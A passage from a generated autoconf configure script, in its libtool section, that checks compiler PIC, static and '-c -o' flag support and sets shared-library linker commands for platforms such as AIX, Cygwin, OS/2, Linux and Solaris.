lt_prog_compiler_static='-Bstatic' case $cc_basename in f77* | f90* | f95* | sunf77* | sunf90* | sunf95*) lt_prog_compiler_wl='-Qoption ld ';; *) lt_prog_compiler_wl='-Wl,';; esac ;; sunos4*) lt_prog_compiler_wl='-Qoption ld ' lt_prog_compiler_pic='-PIC' lt_prog_compiler_static='-Bstatic' ;; sysv4 | sysv4.2uw2* | sysv4.3*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-Bstatic' ;; sysv4*MP*) if test -d /usr/nec; then lt_prog_compiler_pic='-Kconform_pic' lt_prog_compiler_static='-Bstatic' fi ;; sysv5* | unixware* | sco3.2v5* | sco5v6* | OpenUNIX*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-Bstatic' ;; unicos*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_can_build_shared=no ;; uts4*) lt_prog_compiler_pic='-pic' lt_prog_compiler_static='-Bstatic' ;; *) lt_prog_compiler_can_build_shared=no ;; esac fi case $host_os in # For platforms that do not support PIC, -DPIC is meaningless: *djgpp*) lt_prog_compiler_pic= ;; *) lt_prog_compiler_pic="$lt_prog_compiler_pic -DPIC" ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $compiler option to produce PIC" >&5 $as_echo_n "checking for $compiler option to produce PIC... " >&6; } if ${lt_cv_prog_compiler_pic+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_pic=$lt_prog_compiler_pic fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_pic" >&5 $as_echo "$lt_cv_prog_compiler_pic" >&6; } lt_prog_compiler_pic=$lt_cv_prog_compiler_pic # # Check to make sure the PIC flag actually works. # if test -n "$lt_prog_compiler_pic"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler PIC flag $lt_prog_compiler_pic works" >&5 $as_echo_n "checking if $compiler PIC flag $lt_prog_compiler_pic works... " >&6; } if ${lt_cv_prog_compiler_pic_works+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_pic_works=no ac_outfile=conftest.$ac_objext echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="$lt_prog_compiler_pic -DPIC" ## exclude from sc_useless_quotes_in_assignment # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. # The option is referenced via a variable to avoid confusing sed. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>conftest.err) ac_status=$? cat conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" >&5 if (exit $ac_status) && test -s "$ac_outfile"; then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings other than the usual output. $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' >conftest.exp $SED '/^$/d; /^ *+/d' conftest.err >conftest.er2 if test ! -s conftest.er2 || diff conftest.exp conftest.er2 >/dev/null; then lt_cv_prog_compiler_pic_works=yes fi fi $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_pic_works" >&5 $as_echo "$lt_cv_prog_compiler_pic_works" >&6; } if test yes = "$lt_cv_prog_compiler_pic_works"; then case $lt_prog_compiler_pic in "" | " "*) ;; *) lt_prog_compiler_pic=" $lt_prog_compiler_pic" ;; esac else lt_prog_compiler_pic= lt_prog_compiler_can_build_shared=no fi fi # # Check to make sure the static flag actually works. # wl=$lt_prog_compiler_wl eval lt_tmp_static_flag=\"$lt_prog_compiler_static\" { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler static flag $lt_tmp_static_flag works" >&5 $as_echo_n "checking if $compiler static flag $lt_tmp_static_flag works... " >&6; } if ${lt_cv_prog_compiler_static_works+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_static_works=no save_LDFLAGS=$LDFLAGS LDFLAGS="$LDFLAGS $lt_tmp_static_flag" echo "$lt_simple_link_test_code" > conftest.$ac_ext if (eval $ac_link 2>conftest.err) && test -s conftest$ac_exeext; then # The linker can only warn and ignore the option if not recognized # So say no if there are warnings if test -s conftest.err; then # Append any errors to the config.log. cat conftest.err 1>&5 $ECHO "$_lt_linker_boilerplate" | $SED '/^$/d' > conftest.exp $SED '/^$/d; /^ *+/d' conftest.err >conftest.er2 if diff conftest.exp conftest.er2 >/dev/null; then lt_cv_prog_compiler_static_works=yes fi else lt_cv_prog_compiler_static_works=yes fi fi $RM -r conftest* LDFLAGS=$save_LDFLAGS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_static_works" >&5 $as_echo "$lt_cv_prog_compiler_static_works" >&6; } if test yes = "$lt_cv_prog_compiler_static_works"; then : else lt_prog_compiler_static= fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler supports -c -o file.$ac_objext" >&5 $as_echo_n "checking if $compiler supports -c -o file.$ac_objext... " >&6; } if ${lt_cv_prog_compiler_c_o+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_c_o=no $RM -r conftest 2>/dev/null mkdir conftest cd conftest mkdir out echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="-o out/conftest2.$ac_objext" # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>out/conftest.err) ac_status=$? cat out/conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" >&5 if (exit $ac_status) && test -s out/conftest2.$ac_objext then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' > out/conftest.exp $SED '/^$/d; /^ *+/d' out/conftest.err >out/conftest.er2 if test ! -s out/conftest.er2 || diff out/conftest.exp out/conftest.er2 >/dev/null; then lt_cv_prog_compiler_c_o=yes fi fi chmod u+w . 2>&5 $RM conftest* # SGI C++ compiler will create directory out/ii_files/ for # template instantiation test -d out/ii_files && $RM out/ii_files/* && rmdir out/ii_files $RM out/* && rmdir out cd .. $RM -r conftest $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_c_o" >&5 $as_echo "$lt_cv_prog_compiler_c_o" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler supports -c -o file.$ac_objext" >&5 $as_echo_n "checking if $compiler supports -c -o file.$ac_objext... " >&6; } if ${lt_cv_prog_compiler_c_o+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_c_o=no $RM -r conftest 2>/dev/null mkdir conftest cd conftest mkdir out echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="-o out/conftest2.$ac_objext" # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>out/conftest.err) ac_status=$? cat out/conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" >&5 if (exit $ac_status) && test -s out/conftest2.$ac_objext then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' > out/conftest.exp $SED '/^$/d; /^ *+/d' out/conftest.err >out/conftest.er2 if test ! -s out/conftest.er2 || diff out/conftest.exp out/conftest.er2 >/dev/null; then lt_cv_prog_compiler_c_o=yes fi fi chmod u+w . 2>&5 $RM conftest* # SGI C++ compiler will create directory out/ii_files/ for # template instantiation test -d out/ii_files && $RM out/ii_files/* && rmdir out/ii_files $RM out/* && rmdir out cd .. $RM -r conftest $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_c_o" >&5 $as_echo "$lt_cv_prog_compiler_c_o" >&6; } hard_links=nottested if test no = "$lt_cv_prog_compiler_c_o" && test no != "$need_locks"; then # do not overwrite the value of need_locks provided by the user { $as_echo "$as_me:${as_lineno-$LINENO}: checking if we can lock with hard links" >&5 $as_echo_n "checking if we can lock with hard links... " >&6; } hard_links=yes $RM conftest* ln conftest.a conftest.b 2>/dev/null && hard_links=no touch conftest.a ln conftest.a conftest.b 2>&5 || hard_links=no ln conftest.a conftest.b 2>/dev/null && hard_links=no { $as_echo "$as_me:${as_lineno-$LINENO}: result: $hard_links" >&5 $as_echo "$hard_links" >&6; } if test no = "$hard_links"; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: '$CC' does not support '-c -o', so 'make -j' may be unsafe" >&5 $as_echo "$as_me: WARNING: '$CC' does not support '-c -o', so 'make -j' may be unsafe" >&2;} need_locks=warn fi else need_locks=no fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the $compiler linker ($LD) supports shared libraries" >&5 $as_echo_n "checking whether the $compiler linker ($LD) supports shared libraries... " >&6; } runpath_var= allow_undefined_flag= always_export_symbols=no archive_cmds= archive_expsym_cmds= compiler_needs_object=no enable_shared_with_static_runtimes=no export_dynamic_flag_spec= export_symbols_cmds='$NM $libobjs $convenience | $global_symbol_pipe | $SED '\''s/.* //'\'' | sort | uniq > $export_symbols' hardcode_automatic=no hardcode_direct=no hardcode_direct_absolute=no hardcode_libdir_flag_spec= hardcode_libdir_separator= hardcode_minus_L=no hardcode_shlibpath_var=unsupported inherit_rpath=no link_all_deplibs=unknown module_cmds= module_expsym_cmds= old_archive_from_new_cmds= old_archive_from_expsyms_cmds= thread_safe_flag_spec= whole_archive_flag_spec= # include_expsyms should be a list of space-separated symbols to be *always* # included in the symbol list include_expsyms= # exclude_expsyms can be an extended regexp of symbols to exclude # it will be wrapped by ' (' and ')$', so one must not match beginning or # end of line. Example: 'a|bc|.*d.*' will exclude the symbols 'a' and 'bc', # as well as any symbol that contains 'd'. exclude_expsyms='_GLOBAL_OFFSET_TABLE_|_GLOBAL__F[ID]_.*' # Although _GLOBAL_OFFSET_TABLE_ is a valid symbol C name, most a.out # platforms (ab)use it in PIC code, but their linkers get confused if # the symbol is explicitly referenced. Since portable code cannot # rely on this symbol name, it's probably fine to never include it in # preloaded symbol tables. # Exclude shared library initialization/finalization symbols. extract_expsyms_cmds= case $host_os in cygwin* | mingw* | pw32* | cegcc*) # FIXME: the MSVC++ and ICC port hasn't been tested in a loooong time # When not using gcc, we currently assume that we are using # Microsoft Visual C++ or Intel C++ Compiler. if test yes != "$GCC"; then with_gnu_ld=no fi ;; interix*) # we just hope/assume this is gcc and not c89 (= MSVC++ or ICC) with_gnu_ld=yes ;; openbsd* | bitrig*) with_gnu_ld=no ;; esac ld_shlibs=yes # On some targets, GNU ld is compatible enough with the native linker # that we're better off using the native interface for both. lt_use_gnu_ld_interface=no if test yes = "$with_gnu_ld"; then case $host_os in aix*) # The AIX port of GNU ld has always aspired to compatibility # with the native linker. However, as the warning in the GNU ld # block says, versions before 2.19.5* couldn't really create working # shared libraries, regardless of the interface used. case `$LD -v 2>&1` in *\ \(GNU\ Binutils\)\ 2.19.5*) ;; *\ \(GNU\ Binutils\)\ 2.[2-9]*) ;; *\ \(GNU\ Binutils\)\ [3-9]*) ;; *) lt_use_gnu_ld_interface=yes ;; esac ;; *) lt_use_gnu_ld_interface=yes ;; esac fi if test yes = "$lt_use_gnu_ld_interface"; then # If archive_cmds runs LD, not CC, wlarc should be empty wlarc='$wl' # Set some defaults for GNU ld with shared library support. These # are reset later if shared libraries are not supported. Putting them # here allows them to be overridden if necessary. runpath_var=LD_RUN_PATH hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' export_dynamic_flag_spec='$wl--export-dynamic' # ancient GNU ld didn't support --whole-archive et. al. if $LD --help 2>&1 | $GREP 'no-whole-archive' > /dev/null; then whole_archive_flag_spec=$wlarc'--whole-archive$convenience '$wlarc'--no-whole-archive' else whole_archive_flag_spec= fi supports_anon_versioning=no case `$LD -v | $SED -e 's/(^)\+)\s\+//' 2>&1` in *GNU\ gold*) supports_anon_versioning=yes ;; *\ [01].* | *\ 2.[0-9].* | *\ 2.10.*) ;; # catch versions < 2.11 *\ 2.11.93.0.2\ *) supports_anon_versioning=yes ;; # RH7.3 ... *\ 2.11.92.0.12\ *) supports_anon_versioning=yes ;; # Mandrake 8.2 ... *\ 2.11.*) ;; # other 2.11 versions *) supports_anon_versioning=yes ;; esac # See if GNU ld supports shared libraries. case $host_os in aix[3-9]*) # On AIX/PPC, the GNU linker is very broken if test ia64 != "$host_cpu"; then ld_shlibs=no cat <<_LT_EOF 1>&2 *** Warning: the GNU linker, at least up to release 2.19, is reported *** to be unable to reliably create shared libraries on AIX. *** Therefore, libtool is disabling shared libraries support. If you *** really care for shared libraries, you may want to install binutils *** 2.20 or above, or modify your PATH so that a non-GNU linker is found. *** You will then need to restart the configuration process. _LT_EOF fi ;; amigaos*) case $host_cpu in powerpc) # see comment about AmigaOS4 .so support archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds='' ;; m68k) archive_cmds='$RM $output_objdir/a2ixlibrary.data~$ECHO "#define NAME $libname" > $output_objdir/a2ixlibrary.data~$ECHO "#define LIBRARY_ID 1" >> $output_objdir/a2ixlibrary.data~$ECHO "#define VERSION $major" >> $output_objdir/a2ixlibrary.data~$ECHO "#define REVISION $revision" >> $output_objdir/a2ixlibrary.data~$AR $AR_FLAGS $lib $libobjs~$RANLIB $lib~(cd $output_objdir && a2ixlibrary -32)' hardcode_libdir_flag_spec='-L$libdir' hardcode_minus_L=yes ;; esac ;; beos*) if $LD --help 2>&1 | $GREP ': supported targets:.* elf' > /dev/null; then allow_undefined_flag=unsupported # Joseph Beckenbach says some releases of gcc # support --undefined. This deserves some investigation. FIXME archive_cmds='$CC -nostart $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' else ld_shlibs=no fi ;; cygwin* | mingw* | pw32* | cegcc*) # _LT_TAGVAR(hardcode_libdir_flag_spec, ) is actually meaningless, # as there is no search path for DLLs. hardcode_libdir_flag_spec='-L$libdir' export_dynamic_flag_spec='$wl--export-all-symbols' allow_undefined_flag=unsupported always_export_symbols=no enable_shared_with_static_runtimes=yes export_symbols_cmds='$NM $libobjs $convenience | $global_symbol_pipe | $SED -e '\''/^[BCDGRS][ ]/s/.*[ ]\([^ ]*\)/\1 DATA/;s/^.*[ ]__nm__\([^ ]*\)[ ][^ ]*/\1 DATA/;/^I[ ]/d;/^[AITW][ ]/s/.* //'\'' | sort | uniq > $export_symbols' exclude_expsyms='[_]+GLOBAL_OFFSET_TABLE_|[_]+GLOBAL__[FID]_.*|[_]+head_[A-Za-z0-9_]+_dll|[A-Za-z0-9_]+_dll_iname' if $LD --help 2>&1 | $GREP 'auto-import' > /dev/null; then archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags -o $output_objdir/$soname $wl--enable-auto-image-base -Xlinker --out-implib -Xlinker $lib' # If the export-symbols file already is a .def file, use it as # is; otherwise, prepend EXPORTS... archive_expsym_cmds='if test DEF = "`$SED -n -e '\''s/^[ ]*//'\'' -e '\''/^\(;.*\)*$/d'\'' -e '\''s/^\(EXPORTS\|LIBRARY\)\([ ].*\)*$/DEF/p'\'' -e q $export_symbols`" ; then cp $export_symbols $output_objdir/$soname.def; else echo EXPORTS > $output_objdir/$soname.def; cat $export_symbols >> $output_objdir/$soname.def; fi~ $CC -shared $output_objdir/$soname.def $libobjs $deplibs $compiler_flags -o $output_objdir/$soname $wl--enable-auto-image-base -Xlinker --out-implib -Xlinker $lib' else ld_shlibs=no fi ;; haiku*) archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' link_all_deplibs=yes ;; os2*) hardcode_libdir_flag_spec='-L$libdir' hardcode_minus_L=yes allow_undefined_flag=unsupported shrext_cmds=.dll archive_cmds='$ECHO "LIBRARY ${soname%$shared_ext} INITINSTANCE TERMINSTANCE" > $output_objdir/$libname.def~ $ECHO "DESCRIPTION \"$libname\"" >> $output_objdir/$libname.def~ $ECHO "DATA MULTIPLE NONSHARED" >> $output_objdir/$libname.def~ $ECHO EXPORTS >> $output_objdir/$libname.def~ emxexp $libobjs | $SED /"_DLL_InitTerm"/d >> $output_objdir/$libname.def~ $CC -Zdll -Zcrtdll -o $output_objdir/$soname $libobjs $deplibs $compiler_flags $output_objdir/$libname.def~ emximp -o $lib $output_objdir/$libname.def' archive_expsym_cmds='$ECHO "LIBRARY ${soname%$shared_ext} INITINSTANCE TERMINSTANCE" > $output_objdir/$libname.def~ $ECHO "DESCRIPTION \"$libname\"" >> $output_objdir/$libname.def~ $ECHO "DATA MULTIPLE NONSHARED" >> $output_objdir/$libname.def~ $ECHO EXPORTS >> $output_objdir/$libname.def~ prefix_cmds="$SED"~ if test EXPORTS = "`$SED 1q $export_symbols`"; then prefix_cmds="$prefix_cmds -e 1d"; fi~ prefix_cmds="$prefix_cmds -e \"s/^\(.*\)$/_\1/g\""~ cat $export_symbols | $prefix_cmds >> $output_objdir/$libname.def~ $CC -Zdll -Zcrtdll -o $output_objdir/$soname $libobjs $deplibs $compiler_flags $output_objdir/$libname.def~ emximp -o $lib $output_objdir/$libname.def' old_archive_From_new_cmds='emximp -o $output_objdir/${libname}_dll.a $output_objdir/$libname.def' enable_shared_with_static_runtimes=yes file_list_spec='@' ;; interix[3-9]*) hardcode_direct=no hardcode_shlibpath_var=no hardcode_libdir_flag_spec='$wl-rpath,$libdir' export_dynamic_flag_spec='$wl-E' # Hack: On Interix 3.x, we cannot compile PIC because of a broken gcc. # Instead, shared libraries are loaded at an image base (0x10000000 by # default) and relocated if they conflict, which is a slow very memory # consuming and fragmenting process. To avoid this, we pick a random, # 256 KiB-aligned image base between 0x50000000 and 0x6FFC0000 at link # time. Moving up from 0x10000000 also allows more sbrk(2) space. archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib' archive_expsym_cmds='sed "s|^|_|" $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--retain-symbols-file,$output_objdir/$soname.expsym $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib' ;; gnu* | linux* | tpf* | k*bsd*-gnu | kopensolaris*-gnu) tmp_diet=no if test linux-dietlibc = "$host_os"; then case $cc_basename in diet\ *) tmp_diet=yes;; # linux-dietlibc with static linking (!diet-dyn) esac fi if $LD --help 2>&1 | $EGREP ': supported targets:.* elf' > /dev/null \ && test no = "$tmp_diet" then tmp_addflag=' $pic_flag' tmp_sharedflag='-shared' case $cc_basename,$host_cpu in pgcc*) # Portland Group C compiler whole_archive_flag_spec='$wl--whole-archive`for conv in $convenience\"\"; do test -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive' tmp_addflag=' $pic_flag' ;; pgf77* | pgf90* | pgf95* | pgfortran*) # Portland Group f77 and f90 compilers whole_archive_flag_spec='$wl--whole-archive`for conv in $convenience\"\"; do test -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive' tmp_addflag=' $pic_flag -Mnomain' ;; ecc*,ia64* | icc*,ia64*) # Intel C compiler on ia64 tmp_addflag=' -i_dynamic' ;; efc*,ia64* | ifort*,ia64*) # Intel Fortran compiler on ia64 tmp_addflag=' -i_dynamic -nofor_main' ;; ifc* | ifort*) # Intel Fortran compiler tmp_addflag=' -nofor_main' ;; lf95*) # Lahey Fortran 8.1 whole_archive_flag_spec= tmp_sharedflag='--shared' ;; nagfor*) # NAGFOR 5.3 tmp_sharedflag='-Wl,-shared' ;; xl[cC]* | bgxl[cC]* | mpixl[cC]*) # IBM XL C 8.0 on PPC (deal with xlf below) tmp_sharedflag='-qmkshrobj' tmp_addflag= ;; nvcc*) # Cuda Compiler Driver 2.2 whole_archive_flag_spec='$wl--whole-archive`for conv in $convenience\"\"; do test -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive' compiler_needs_object=yes ;; esac case `$CC -V 2>&1 | sed 5q` in *Sun\ C*) # Sun C 5.9 whole_archive_flag_spec='$wl--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive' compiler_needs_object=yes tmp_sharedflag='-G' ;; *Sun\ F*) # Sun Fortran 8.3 tmp_sharedflag='-G' ;; esac archive_cmds='$CC '"$tmp_sharedflag""$tmp_addflag"' $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' if test yes = "$supports_anon_versioning"; then archive_expsym_cmds='echo "{ global:" > $output_objdir/$libname.ver~ cat $export_symbols | sed -e "s/\(.*\)/\1;/" >> $output_objdir/$libname.ver~ echo "local: *; };" >> $output_objdir/$libname.ver~ $CC '"$tmp_sharedflag""$tmp_addflag"' $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-version-script $wl$output_objdir/$libname.ver -o $lib' fi case $cc_basename in tcc*) export_dynamic_flag_spec='-rdynamic' ;; xlf* | bgf* | bgxlf* | mpixlf*) # IBM XL Fortran 10.1 on PPC cannot create shared libs itself whole_archive_flag_spec='--whole-archive$convenience --no-whole-archive' hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' archive_cmds='$LD -shared $libobjs $deplibs $linker_flags -soname $soname -o $lib' if test yes = "$supports_anon_versioning"; then archive_expsym_cmds='echo "{ global:" > $output_objdir/$libname.ver~ cat $export_symbols | sed -e "s/\(.*\)/\1;/" >> $output_objdir/$libname.ver~ echo "local: *; };" >> $output_objdir/$libname.ver~ $LD -shared $libobjs $deplibs $linker_flags -soname $soname -version-script $output_objdir/$libname.ver -o $lib' fi ;; esac else ld_shlibs=no fi ;; netbsd*) if echo __ELF__ | $CC -E - | $GREP __ELF__ >/dev/null; then archive_cmds='$LD -Bshareable $libobjs $deplibs $linker_flags -o $lib' wlarc= else archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' fi ;; solaris*) if $LD -v 2>&1 | $GREP 'BFD 2\.8' > /dev/null; then ld_shlibs=no cat <<_LT_EOF 1>&2 *** Warning: The releases 2.8.* of the GNU linker cannot reliably *** create shared libraries on Solaris systems. Therefore, libtool *** is disabling shared libraries support. We urge you to upgrade GNU *** binutils to release 2.9.1 or newer. Another option is to modify *** your PATH or compiler configuration so that the native linker is *** used, and then restart. _LT_EOF elif $LD --help 2>&1 | $GREP ': supported targets:.* elf' > /dev/null; then archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' else ld_shlibs=no fi ;; sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*) case `$LD -v 2>&1` in *\ [01].* | *\ 2.[0-9].* | *\ 2.1[0-5].*) ld_shlibs=no cat <<_LT_EOF 1>&2 *** Warning: Releases of the GNU linker prior to 2.16.91.0.3 cannot *** reliably create shared libraries on SCO systems. Therefore, libtool *** is disabling shared libraries support. We urge you to upgrade GNU *** binutils to release 2.16.91.0.3 or newer. Another option is to modify *** your PATH or compiler configuration so that the native linker is *** used, and then restart. _LT_EOF ;; *) # For security reasons, it is highly recommended that you always # use absolute paths for naming shared libraries, and exclude the # DT_RUNPATH tag from executables and libraries. But doing so # requires that you compile everything twice, which is a pain. if $LD --help 2>&1 | $GREP ': supported targets:.* elf' > /dev/null; then hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds='$CC -shared $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' else ld_shlibs=no fi ;; esac ;; sunos4*) archive_cmds='$LD -assert pure-text -Bshareable -o $lib $libobjs $deplibs $linker_flags' wlarc= hardcode_direct=yes hardcode_shlibpath_var=no ;; *) if $LD --help 2>&1 | $GREP ': supported targets:.* elf' > /dev/null; then archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' else ld_shlibs=no fi ;; esac if test no = "$ld_shlibs"; then runpath_var= hardcode_libdir_flag_spec= export_dynamic_flag_spec= whole_archive_flag_spec= fi else # PORTME fill in a description of your system's linker (not GNU ld) case $host_os in aix3*) allow_undefined_flag=unsupported always_export_symbols=yes archive_expsym_cmds='$LD -o $output_objdir/$soname $libobjs $deplibs $linker_flags -bE:$export_symbols -T512 -H512 -bM:SRE~$AR $AR_FLAGS $lib $output_objdir/$soname' # Note: this linker hardcodes the directories in LIBPATH if there # are no directories specified by -L. hardcode_minus_L=yes if test yes = "$GCC" && test -z "$lt_prog_compiler_static"; then # Neither direct hardcoding nor static linking is supported with a # broken collect2. hardcode_direct=unsupported fi ;; aix[4-9]*) if test ia64 = "$host_cpu"; then # On IA64, the linker does run time linking by default, so we don't # have to do anything special. aix_use_runtimelinking=no exp_sym_flag='-Bexport' no_entry_flag= else # If we're using GNU nm, then we don't want the "-C" option. # -C means demangle to GNU nm, but means don't demangle to AIX nm. # Without the "-l" option, or with the "-B" option, AIX nm treats # weak defined symbols like other global defined symbols, whereas # GNU nm marks them as "W". # While the 'weak' keyword is ignored in the Export File, we need # it in the Import File for the 'aix-soname' feature, so we have # to replace the "-B" option with "-P" for AIX nm. if $NM -V 2>&1 | $GREP 'GNU' > /dev/null; then export_symbols_cmds='$NM -Bpg $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "W")) && (substr(\$ 3,1,1) != ".")) { if (\$ 2 == "W") { print \$ 3 " weak" } else { print \$ 3 } } }'\'' | sort -u > $export_symbols' else export_symbols_cmds='`func_echo_all $NM | $SED -e '\''s/B\([^B]*\)$/P\1/'\''` -PCpgl $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "L") || (\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) && (substr(\$ 1,1,1) != ".")) { if ((\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) { print \$ 1 " weak" } else { print \$ 1 } } }'\'' | sort -u > $export_symbols' fi aix_use_runtimelinking=no # Test if we are trying to use run time linking or normal # AIX style linking. If -brtl is somewhere in LDFLAGS, we # have runtime linking enabled, and use it for executables. # For shared libraries, we enable/disable runtime linking # depending on the kind of the shared library created - # when "with_aix_soname,aix_use_runtimelinking" is: # "aix,no" lib.a(lib.so.V) shared, rtl:no, for executables # "aix,yes" lib.so shared, rtl:yes, for executables # lib.a static archive # "both,no" lib.so.V(shr.o) shared, rtl:yes # lib.a(lib.so.V) shared, rtl:no, for executables # "both,yes" lib.so.V(shr.o) shared, rtl:yes, for executables # lib.a(lib.so.V) shared, rtl:no # "svr4,*" lib.so.V(shr.o) shared, rtl:yes, for executables # lib.a static archive case $host_os in aix4.[23]|aix4.[23].*|aix[5-9]*) for ld_flag in $LDFLAGS; do if (test x-brtl = "x$ld_flag" || test x-Wl,-brtl = "x$ld_flag"); then aix_use_runtimelinking=yes break fi done if test svr4,no = "$with_aix_soname,$aix_use_runtimelinking"; then # With aix-soname=svr4, we create the lib.so.V shared archives only, # so we don't have lib.a shared libs to link our executables. # We have to force runtime linking in this case. aix_use_runtimelinking=yes LDFLAGS="$LDFLAGS -Wl,-brtl" fi ;; esac exp_sym_flag='-bexport' no_entry_flag='-bnoentry' fi # When large executables or shared objects are built, AIX ld can # have problems creating the table of contents. If linking a library # or program results in "error TOC overflow" add -mminimal-toc to # CXXFLAGS/CFLAGS for g++/gcc. In the cases where that is not # enough to fix the problem, add -Wl,-bbigtoc to LDFLAGS. archive_cmds='' hardcode_direct=yes hardcode_direct_absolute=yes hardcode_libdir_separator=':' link_all_deplibs=yes file_list_spec='$wl-f,' case $with_aix_soname,$aix_use_runtimelinking in aix,*) ;; # traditional, no import file svr4,* | *,yes) # use import file # The Import File defines what to hardcode. 